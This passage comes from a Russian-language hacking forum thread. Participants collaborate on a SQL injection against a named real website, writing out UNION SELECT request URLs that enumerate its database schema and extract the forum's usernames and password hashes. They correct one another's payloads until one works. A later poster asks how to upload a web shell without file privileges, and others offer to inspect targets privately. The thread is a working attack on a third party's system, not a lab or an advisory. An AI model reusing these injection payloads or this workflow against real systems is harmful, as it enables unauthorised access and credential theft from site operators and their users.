05.10.2008, 15:15
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
geforce, я эти ссылки дал тебе не просто так. Если есть сплойты в паблике, то они есть там.
|
|
|
05.10.2008, 15:23
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
С нами:
10399666
Репутация:
94
|
|
Так вроде бы все хорошо но...
Хочется достать логин и пасс форума
Вот делаю запрос
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+moxieforge.punbb_users+limit+1,1/*
не проходит
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce.punbb_users+limit+1,1/*
Не проходит делаю запрос другой
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/*
не проходит
Вопрос.
Где же может валятся таблица с юзверями форума? |
|
|
|
05.10.2008, 15:27
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами:
10240166
Репутация:
2097
|
|
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat(table_name,0x3a,table_schema),8+from+information_schema.tables/*
punbb_users:tinymce_punbb
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
05.10.2008, 16:12
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Сообщение от l-l00K
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat(table_name,0x3a,table_schema),8+from+information_schema.tables/*
punbb_users:tinymce_punbb Почему не работает???
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,user_password),8+from+tinymce.ti nymce_punbb/**/
|
|
|
|
05.10.2008, 16:18
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от geforce
Почему не работает???
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,user_password),8+from+tinymce.ti nymce_punbb/**/
Вот так наверное:
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce_punbb.punbb_users
punbb_users - таблица с пользователями
tinymce_punbb - БД в которой лежит эта таблица
|
|
|
|
05.10.2008, 22:23
|
|
Новичок
Регистрация: 18.08.2008
Сообщений: 8
С нами:
9331195
Репутация:
5
|
|
имеется сайт с sql injection. если у пользователся нет file_priv и адрес админки невозможно найти, то вообще бесполезно что-то пытаться сделать?
к примеру хотел залишь шелл, но ведь нет прав на файлы у юзверя 
тоесть load_file()
into dumpfile отказываются работать
у юзера есть права только на одну базу данных. к mysql.user доступа не имеет
Последний раз редактировалось dArKkNiGHt; 05.10.2008 в 22:58..
|
|
|
|
05.10.2008, 23:14
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
dArKkNiGHt,
https://forum.antichat.ru/threadnav34338-1-10.html
Вот это попробуй. И поищи какой-нить форум, или гестбуку или хоть что-то, за что можно зацепица. И попробуй погуглить админку  |
|
|
|
06.10.2008, 20:35
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Велемир, ну, тогда, сложно так сказать. Надо смотреть сайты сами. Если интересно - постучи в асю или скинь линки в личку - посмотрим что там |
|
|
|
06.10.2008, 22:57
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от n0ne
Велемир, ну, тогда, сложно так сказать. Надо смотреть сайты сами. Если интересно - постучи в асю или скинь линки в личку - посмотрим что там Я бы и рад дать сайтег,но он не содержания аля пиво.ру ((.Придётся,видимо,разбират ся самому(((.Всё равно спасибо
|
|
|
|
06.10.2008, 22:56
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Последний раз редактировалось Велемир; 06.10.2008 в 22:58..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
